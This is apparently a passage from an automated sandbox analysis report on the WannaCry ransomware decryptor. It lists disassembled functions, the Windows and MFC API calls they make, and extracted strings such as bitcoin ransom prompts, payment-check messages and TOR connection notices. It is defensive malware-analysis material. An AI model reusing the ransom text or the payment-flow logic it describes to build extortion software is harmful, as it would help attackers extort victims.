    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00407E80, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 67
    APIs
    • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 00407EE6
    • wcslen.MSVCRT ref: 00407EF4
    • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.bmp), ref: 00407F20
    • MultiByteToWideChar.KERNEL32(00000000,00000000,b.wnry,000000FF,?,00000103), ref: 00407F41
    • CopyFileW.KERNEL32(?,?,00000000), ref: 00407F56
    • SystemParametersInfoW.USER32(00000014,00000000,?,00000001), ref: 00407F67
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 004067F0, Relevance: 13.6, APIs: 9, Instructions: 71
    APIs
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00406C20, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72
    APIs
    • GetUserDefaultLangID.KERNEL32 ref: 00406C3B
    • GetLocaleInfoA.KERNEL32(00000000,00001001,00000000,00000032), ref: 00406C53
    • SendMessageA.USER32(?,00000158,00000000,00000000), ref: 00406C9A
    • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00406CB1
    • SendMessageA.USER32(?,0000014D,00000000,00000000), ref: 00406CD4
      • Part of subcall function 00406AE0: #540.MFC42(?,0001DAA0), ref: 00406B03
      • Part of subcall function 00406AE0: #3874.MFC42 ref: 00406B1B
      • Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B29
      • Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406B41
      • Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406B59
      • Part of subcall function 00406AE0: #800.MFC42(?,?,0001DAA0), ref: 00406B62
      • Part of subcall function 00406AE0: #800.MFC42 ref: 00406B73
      • Part of subcall function 00406AE0: GetFileAttributesA.KERNEL32(?), ref: 00406B7D
      • Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B91
      • Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406BA9
      • Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406BBB
      • Part of subcall function 00406AE0: #800.MFC42(?,?,?,?,?,0001DAA0), ref: 00406BC4
      • Part of subcall function 00406AE0: #800.MFC42 ref: 00406BD5
      • Part of subcall function 00406AE0: #800.MFC42(?), ref: 00406BF5
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00404770, Relevance: 1.5, APIs: 1, Instructions: 24
    APIs
    • CryptReleaseContext.ADVAPI32(FFFFFFFF,00000000,?,004049AD,00404990), ref: 004047A7
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 004090F0, Relevance: 56.5, APIs: 21, Strings: 11, Instructions: 454
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00405230, Relevance: 49.8, APIs: 33, Instructions: 279
    APIs
    • #940.MFC42(?), ref: 0040527D
    • #4277.MFC42(?,00000001), ref: 004052A0
    • #923.MFC42(?,00000000,?), ref: 004052B8
    • #858.MFC42(00000000,?,00000000,?), ref: 004052C5
    • #800.MFC42(00000000,?,00000000,?), ref: 004052D3
    • #800.MFC42(00000000,?,00000000,?), ref: 004052E4
    • #4129.MFC42(?,?), ref: 004052FC
    • #5710.MFC42 ref: 00405314
    • #922.MFC42(?,00000000,00000000), ref: 00405326
    • #858.MFC42(00000000,?,00000000,00000000), ref: 00405333
    • #800.MFC42(00000000,?,00000000,00000000), ref: 00405340
    • #800.MFC42(00000000,?,00000000,00000000), ref: 0040534E
    • #800.MFC42(00000000,?,00000000,00000000), ref: 0040535F
    • #940.MFC42(?), ref: 00405396
    • #5710.MFC42(?,?), ref: 004053B8
    • #4129.MFC42(?,?,?,?), ref: 004053D7
    • #922.MFC42(?,?,00000000,?,?,?,?), ref: 004053ED
    • #858.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 004053FA
    • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405407
    • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405415
    • #800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405426
    • #4129.MFC42(?,?), ref: 00405443
    • #4277.MFC42(?,?,?,?), ref: 0040545B
    • #922.MFC42(?,00000000,?,?,?,?,?), ref: 00405471
    • #858.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040547E
    • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040548B
    • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 00405499
    • #800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 004054AA
    • #6778.MFC42(?,00000001), ref: 004054EA
    • #6648.MFC42(00000000,00000001,?,00000001), ref: 004054F4
    • #6778.MFC42(00000000,?), ref: 00405536
    • #6648.MFC42(?,00000001,00000000,?), ref: 00405545
    • InvalidateRect.USER32(?,00000000,00000001), ref: 0040555A
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 004082C0, Relevance: 47.4, APIs: 21, Strings: 6, Instructions: 181
    APIs
    • #4278.MFC42(000003E8,00000000,000003E8,?,?,0001D474), ref: 0040830D
    • #858.MFC42 ref: 00408322
    • #800.MFC42 ref: 00408332
    • #1200.MFC42(Too short message!,00000000,00000000,?,?,0001D474), ref: 00408354
    • #800.MFC42 ref: 0040836B
    • time.MSVCRT ref: 0040837F
    • #540.MFC42 ref: 004083C8
    • time.MSVCRT ref: 004083D6
    • #2818.MFC42(?,You are sending too many mails! Please try again %d minutes later.,0000003D,00000000), ref: 0040840A
    • #1200.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408419
    • #800.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408429
    • #800.MFC42 ref: 00408440
    • time.MSVCRT ref: 0040844E
    • fopen.MSVCRT ref: 00408487
    • #800.MFC42 ref: 004084A8
    • fread.MSVCRT ref: 004084C2
    • fclose.MSVCRT ref: 004084C9
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BE9C
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEAD
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEBE
      • Part of subcall function 0040C060: SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C0D5
      • Part of subcall function 0040C060: SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C102
      • Part of subcall function 0040C060: SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C152
      • Part of subcall function 0040C060: SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C189
      • Part of subcall function 0040C060: SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C1C2
      • Part of subcall function 0040C060: SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C1FE
    • #1200.MFC42(Your message has been sent successfully!,00000040,00000000), ref: 00408522
    • time.MSVCRT ref: 00408528
    • #1200.MFC42(Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!,00000030,00000000), ref: 00408544
    • #800.MFC42 ref: 0040855B
    Strings
    • Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 0040853F
    • You are sending too many mails! Please try again %d minutes later., xrefs: 00408404
    • 00000000.res, xrefs: 00408480
    • s.wnry, xrefs: 004084DD
    • Too short message!, xrefs: 0040834F
    • Your message has been sent successfully!, xrefs: 0040851D
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 004086E0, Relevance: 40.6, APIs: 20, Strings: 3, Instructions: 324
    APIs
    • #470.MFC42 ref: 00408708
    • GetClientRect.USER32(?,?), ref: 0040871F
    • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00408730
    • #6734.MFC42(?,?), ref: 00408746
    • #323.MFC42(?,?), ref: 0040874F
    • CreateCompatibleDC.GDI32(?), ref: 004087D2
    • #1640.MFC42(00000000), ref: 004087DD
      • Part of subcall function 00409E70: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00409E85
      • Part of subcall function 00409E70: #1641.MFC42(00000000,?,00408809,?,?,?,00000000), ref: 00409E8E
    • #6194.MFC42(?,?,?,\gA,?,?,?,00000000), ref: 00408831
    • FillRect.USER32(?,?,?), ref: 0040887D
    • #2754.MFC42(?,?), ref: 00408892
    • #2381.MFC42(?,?,?), ref: 0040889F
    • #3797.MFC42(?,?,?), ref: 004088C0
    • _ftol.MSVCRT ref: 00408951
    • _ftol.MSVCRT ref: 0040896F
    • FillRect.USER32(?,00000000,00000000), ref: 004089B0
    • FillRect.USER32(?,00000000,?), ref: 004089C2
      • Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F1D
      • Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F2D
    • #755.MFC42(?,?,?), ref: 00408B20
      • Part of subcall function 00409F80: BitBlt.GDI32(?,?,?,?,\gA,?,\gA,\gA,\gA), ref: 00409FB3
    • #5785.MFC42(?,00000000,?,?,?,?,?,?,?,00CC0020,?,?,?), ref: 00408ACE
    • #5785.MFC42(?,?,?,?,?,?,?,?,?,00CC0020,?,?,?), ref: 00408ADE
      • Part of subcall function 00409E20: #2414.MFC42(?,\gA,?,00414238,000000FF,00408AFE,?,?,?), ref: 00409E4B
    • #640.MFC42(?,?,?), ref: 00408B09
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00402AF0, Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 133
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00401760, Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 140
    APIs
    • #6453.MFC42 ref: 00401780
    • WaitForSingleObject.KERNEL32(?,00000BB8), ref: 00401797
    • TerminateThread.KERNEL32(?,00000000), ref: 004017A5
    • CloseHandle.KERNEL32(?), ref: 004017B2
    • sprintf.MSVCRT ref: 00401811
    • fopen.MSVCRT ref: 00401821
    • fread.MSVCRT ref: 00401844
    • fclose.MSVCRT ref: 0040184D
    • DeleteFileA.KERNEL32(?), ref: 0040185B
    • #537.MFC42(You have a new message:), ref: 00401885
    • #924.MFC42(?,00000000,?,You have a new message:), ref: 0040189C
    • #1200.MFC42 ref: 004018AF
    • #800.MFC42 ref: 004018BF
    • #800.MFC42 ref: 004018D3
    • #1200.MFC42(You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday.,000000F0,00000000), ref: 004018E5
    • rand.MSVCRT ref: 00401903
    • #1200.MFC42(Congratulations! Your payment has been checked!Start decrypting now!,00000040,00000000), ref: 00401939
    Strings
    • %08X.dky, xrefs: 0040180A
    • You have a new message:, xrefs: 00401877
    • Congratulations! Your payment has been checked!Start decrypting now!, xrefs: 00401934
    • You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday., xrefs: 004018E0, 00401925
    • Failed to check your payment!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 00401918
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 004012E0, Relevance: 37.0, APIs: 15, Strings: 6, Instructions: 202
    APIs
    • sprintf.MSVCRT ref: 00401323
    • sprintf.MSVCRT ref: 00401339
    • GetFileAttributesA.KERNEL32(?), ref: 00401343
    • DeleteFileA.KERNEL32(?), ref: 0040139A
    • fopen.MSVCRT ref: 004013D5
    • fread.MSVCRT ref: 00401405
    • fclose.MSVCRT ref: 00401408
    • sprintf.MSVCRT ref: 00401440
    • fopen.MSVCRT ref: 00401453
    • fread.MSVCRT ref: 00401481
    • fclose.MSVCRT ref: 00401484
    • sprintf.MSVCRT ref: 004014C1
    • fopen.MSVCRT ref: 004014D4
    • fread.MSVCRT ref: 00401502
    • fclose.MSVCRT ref: 00401507
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BE9C
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEAD
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEBE
      • Part of subcall function 0040C240: SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2B6
      • Part of subcall function 0040C240: SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2E3
      • Part of subcall function 0040C240: SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C3B7
      • Part of subcall function 0040C240: SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C3EE
      • Part of subcall function 0040C240: SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C427
      • Part of subcall function 0040C240: fopen.MSVCRT ref: 0040C46B
      • Part of subcall function 0040C240: fwrite.MSVCRT ref: 0040C489
      • Part of subcall function 0040C240: fclose.MSVCRT ref: 0040C48F
      • Part of subcall function 0040C240: SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C4A9
      • Part of subcall function 00404640: InitializeCriticalSection.KERNEL32(?,?,0040158C), ref: 00404658
      • Part of subcall function 004047C0: _local_unwind2.MSVCRT ref: 004048EB
      • Part of subcall function 004047C0: strncmp.MSVCRT(00000000,?), ref: 00404951
      • Part of subcall function 004047C0: _local_unwind2.MSVCRT ref: 00404964
      • Part of subcall function 00404690: DeleteCriticalSection.KERNEL32(?,004015D8), ref: 0040469A
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 004035A0, Relevance: 36.2, APIs: 24, Instructions: 175
    APIs
    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004035DB
    • OpenClipboard.USER32(?), ref: 004035E9
    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00403609
    • #3301.MFC42(?,00000000,00000000), ref: 0040361A
    • #924.MFC42 ref: 00403635
    • #800.MFC42 ref: 00403646
    • #800.MFC42 ref: 00403665
    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040367B
    • GlobalAlloc.KERNEL32(00000002,-00000002), ref: 00403687
    • GlobalLock.KERNEL32(00000000), ref: 0040369C
    • GlobalFree.KERNEL32(00000000), ref: 004036AB
    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004036C8
    • #3301.MFC42(?,00000000,00000000), ref: 004036E7
    • #924.MFC42(00000000), ref: 00403702
    • #800.MFC42(00000000), ref: 00403713
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000167,00000000), ref: 00403748
    • wcslen.MSVCRT ref: 00403753
    • wcslen.MSVCRT ref: 0040377B
    • #800.MFC42 ref: 00403797
    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004037B1
    • GlobalUnlock.KERNEL32(00000000), ref: 004037CE
    • EmptyClipboard.USER32 ref: 004037D4
    • SetClipboardData.USER32(0000000D,00000000), ref: 004037DD
    • CloseClipboard.USER32 ref: 004037E3
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 004076A0, Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 239
    APIs
    • time.MSVCRT ref: 004076DA
    • sprintf.MSVCRT ref: 0040780E
      • Part of subcall function 00405180: _mbscmp.MSVCRT ref: 00405191
      • Part of subcall function 00405180: #860.MFC42(?), ref: 004051A1
      • Part of subcall function 00405180: RedrawWindow.USER32(?,00000000,00000000,00000121), ref: 004051DE
      • Part of subcall function 00405180: InvalidateRect.USER32(?,00000000,00000001), ref: 004051F2
    • SendMessageA.USER32(?,00000402,?,00000000), ref: 0040785B
    • SendMessageA.USER32(?,00000402,?,00000000), ref: 00407870
    • #540.MFC42 ref: 00407876
    • _ftol.MSVCRT ref: 004078AA
    • #2818.MFC42(?,$%d,00000000), ref: 004078BE
    • #2818.MFC42(?,Send $%d worth of bitcoin to this address:,00000000), ref: 004078D1
    • #2818.MFC42(?,%.1f BTC,?,?), ref: 004078F5
    • #2818.MFC42(?,Send %.1f BTC to this address:,?,?), ref: 00407909
    • #3092.MFC42(00000402,?), ref: 0040791D
    • #6199.MFC42(00000402,?), ref: 00407924
    • InvalidateRect.USER32(?,00000000,00000001), ref: 0040795A
    • #800.MFC42 ref: 0040799F
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 004060E0, Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 139
    APIs
    • #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
    • #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
    • #567.MFC42(00000066,00000000), ref: 0040612F
    • #567.MFC42(00000066,00000000), ref: 00406147
      • Part of subcall function 004085C0: #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
      • Part of subcall function 004085C0: #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
      • Part of subcall function 004085C0: GetSysColor.USER32 ref: 0040861D
      • Part of subcall function 004085C0: GetSysColor.USER32(00000009), ref: 00408624
      • Part of subcall function 004085C0: GetSysColor.USER32(00000012), ref: 0040862B
      • Part of subcall function 004085C0: GetSysColor.USER32(00000002), ref: 00408632
      • Part of subcall function 004085C0: SystemParametersInfoA.USER32(00001008,00000000,00000000,00000000), ref: 0040864A
      • Part of subcall function 004085C0: GetSysColor.USER32(0000001B), ref: 0040865C
      • Part of subcall function 004085C0: #6140.MFC42(00000002,000000FF), ref: 00408667
      • Part of subcall function 00404090: #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
      • Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
      • Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
      • Part of subcall function 00404090: #860.MFC42(00421798), ref: 004040F6
      • Part of subcall function 00404090: #858.MFC42(00000000,00421798), ref: 004040FE
      • Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F89), ref: 00404118
      • Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F00), ref: 00404123
      • Part of subcall function 00405000: #567.MFC42(?,?,?,?,00413893,000000FF), ref: 0040501E
      • Part of subcall function 00405000: #540.MFC42(?,?,?,?,00413893,000000FF), ref: 00405032
    • #567.MFC42(00000066,00000000), ref: 004061DF
    • #540.MFC42(00000066,00000000), ref: 004061F7
    • #540.MFC42(00000066,00000000), ref: 00406209
    • #540.MFC42(00000066,00000000), ref: 00406219
    • #540.MFC42(00000066,00000000), ref: 00406229
    • #860.MFC42(00421798,00000066,00000000), ref: 004062F7
    • #860.MFC42(00421798,00421798,00000066,00000000), ref: 00406303
    • #860.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406313
    • #1168.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406318
    • #1146.MFC42(00000080,0000000E,00000080,00421798,00421798,00421798,00000066,00000000), ref: 00406329
    • LoadIconA.USER32(00000000,00000080), ref: 0040632F
    • #860.MFC42(00421798), ref: 00406358
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 00405E10, Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 144
    APIs
    • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E4F
    • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E71
    • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E93
    • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405EB5
      • Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B
    • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F2F
    • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F93
    • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FA9
    • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FB9
    • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FC9
    • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FD9
    • #781.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FE9
      • Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
      • Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD
      • Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
      • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
      • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
      • Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
    • #654.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406066
    • #765.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406072
      • Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
      • Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD
    • #609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406092
    • #609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060A2
    • #616.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060AF
    • #641.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060BE
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    Function 004032C0, Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 114
    APIs
    • #4710.MFC42 ref: 004032C5
    • CreateSolidBrush.GDI32(?), ref: 004032DC
